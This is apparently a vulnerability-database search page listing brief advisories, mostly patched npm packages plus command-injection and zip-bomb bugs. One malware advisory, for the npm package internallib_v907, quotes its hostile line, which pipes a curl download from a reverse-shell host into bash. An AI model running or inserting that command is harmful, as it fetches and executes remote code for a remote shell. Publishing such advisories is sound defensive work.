Lucene search
+L

142247 matches found

OSV
OSV
added 9 hours ago29 views

ROOT-APP-NPM-CVE-2026-45740 CVE-2026-45740 in @rootio/protobufjs - Patched by Root

Root has patched CVE-2026-45740 in the @rootio/protobufjs package for Root:npm. Multiple fixed versions available...

5.3CVSS5.8AI score0.00263EPSS
Exploits0
OSV
OSV
added yesterday16 views

ROOT-APP-NPM-CVE-2026-24118 CVE-2026-24118 in @rootio/vm2 - Patched by Root

Root has patched CVE-2026-24118 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

9.8CVSS6AI score0.00917EPSS
Exploits1
OSV
OSV
added yesterday10 views

ROOT-APP-NPM-CVE-2026-44003 CVE-2026-44003 in @rootio/vm2 - Patched by Root

Root has patched CVE-2026-44003 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

5.3CVSS5.8AI score0.00248EPSS
Exploits1
OSV
OSV
added yesterday4 views

ROOT-APP-NPM-CVE-2026-26956 CVE-2026-26956 in @rootio/vm2 - Patched by Root

Root has patched CVE-2026-26956 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

9.8CVSS7.1AI score0.00921EPSS
Exploits1
OSV
OSV
added yesterday4 views

ROOT-APP-NPM-AIKIDO-2026-10844 AIKIDO-2026-10844 in @rootio/vm2 - Patched by Root

Root has patched AIKIDO-2026-10844 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

6.1AI score
Exploits0
OSV
OSV
added yesterday3 views

ROOT-APP-NPM-AIKIDO-2026-10841 AIKIDO-2026-10841 in @rootio/vm2 - Patched by Root

Root has patched AIKIDO-2026-10841 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

6.1AI score
Exploits0
OSV
OSV
added yesterday39 views

ROOT-APP-NPM-CVE-2026-44009 CVE-2026-44009 in @rootio/vm2 - Patched by Root

Root has patched CVE-2026-44009 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

9.8CVSS6AI score0.00812EPSS
Exploits1
OSV
OSV
added yesterday4 views

ROOT-APP-NPM-AIKIDO-2026-10689 AIKIDO-2026-10689 in @rootio/vm2 - Patched by Root

Root has patched AIKIDO-2026-10689 in the @rootio/vm2 package for Root:npm. Multiple fixed versions available...

6.1AI score
Exploits0
CVE
CVE
added yesterday14 views

CVE-2026-11386

Summary: CVE-2026-11386 affects Canonical ubuntu-pro-client (formerly ubuntu-advantage-tools). The package builds APT source files by interpolating contract server data from directives.suites[] and directives.aptURL without escaping or validation, allowing newline characters to inject attacker-co...

9CVSS6.4AI score
Exploits0References1
OSV
OSV
added yesterday6 views

ROOT-APP-NPM-CVE-2026-54288 CVE-2026-54288 in @rootio/hono - Patched by Root

Root has patched CVE-2026-54288 in the @rootio/hono package for Root:npm. Multiple fixed versions available...

6.5CVSS6.1AI score0.00103EPSS
Exploits0
OSV
OSV
added yesterday8 views

ROOT-APP-NPM-CVE-2026-47675 CVE-2026-47675 in @rootio/hono - Patched by Root

Root has patched CVE-2026-47675 in the @rootio/hono package for Root:npm. Multiple fixed versions available...

5.3CVSS5.8AI score0.00216EPSS
Exploits0
OSV
OSV
added yesterday7 views

ROOT-APP-NPM-CVE-2026-56761 CVE-2026-56761 in @rootio/hono - Patched by Root

Root has patched CVE-2026-56761 in the @rootio/hono package for Root:npm. Multiple fixed versions available...

5.3CVSS5.8AI score0.00174EPSS
Exploits0
OSV
OSV
added yesterday4 views

ROOT-APP-NPM-CVE-2026-54314 CVE-2026-54314 in @rootio/n8n - Patched by Root

Root has patched CVE-2026-54314 in the @rootio/n8n package for Root:npm. Multiple fixed versions available...

7.5CVSS6.1AI score0.00375EPSS
Exploits0
OSV
OSV
added 2 days ago4 views

MAL-2026-10691 Malicious code in internallib_v907 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...

6.1AI score
Exploits0References2
EUVD
EUVD
added 2 days ago12 views

EUVD-2026-44768

OS command injection in the npm package loading component in AWS jsii-diff before 1.131.0 might allow context-dependent attackers to execute arbitrary commands via crafted package specifiers passed to the npm: source argument. To mitigate this issue, users should upgrade to jsii-diff v1.131.0 or...

8.4CVSS6.3AI score0.01241EPSS
Exploits0References2
OSV
OSV
added 2 days ago4 views

CVE-2026-15895 OS command injection in jsii-diff in AWS jsii

OS command injection in the npm package loading component in AWS jsii-diff before 1.131.0 might allow context-dependent attackers to execute arbitrary commands via crafted package specifiers passed to the npm: source argument. To mitigate this issue, users should upgrade to jsii-diff v1.131.0 or...

8.4CVSS6.3AI score0.01241EPSS
Exploits0References4
OSV
OSV
added 2 days ago12 views

ROOT-APP-NPM-CVE-2026-27980 CVE-2026-27980 in @rootio/next - Patched by Root

Root has patched CVE-2026-27980 in the @rootio/next package for Root:npm. Multiple fixed versions available...

7.5CVSS5.8AI score0.00683EPSS
Exploits0
OSV
OSV
added 2 days ago8 views

ROOT-APP-NPM-CVE-2026-29057 CVE-2026-29057 in @rootio/next - Patched by Root

Root has patched CVE-2026-29057 in the @rootio/next package for Root:npm. Multiple fixed versions available...

6.5CVSS5.2AI score0.00427EPSS
Exploits0
OSV
OSV
added 2 days ago4 views

CVE-2026-61449 Grav before 2.0.2 Decompression Bomb via Forged ZIP Size

Grav 2.0.1 contains a decompression-bomb size-cap bypass in ZipArchiver and GPM\Installer. The size bound introduced in 2.0.1 sums the uncompressed size declared in each entry's ZIP central-directory header ZipArchive::statIndex'size' and rejects archives exceeding...

7.1CVSS6.1AI score0.00247EPSS
Exploits0References4
OSV
OSV
added 2 days ago3 views

ROOT-APP-NPM-GHSA-VVJJ-XCJG-GR5G GHSA-vvjj-xcjg-gr5g in @rootio/nodemailer - Patched by Root

Root has patched GHSA-vvjj-xcjg-gr5g in the @rootio/nodemailer package for Root:npm. Multiple fixed versions available...

4.9CVSS5.8AI score
Exploits0
Rows per page
Query Builder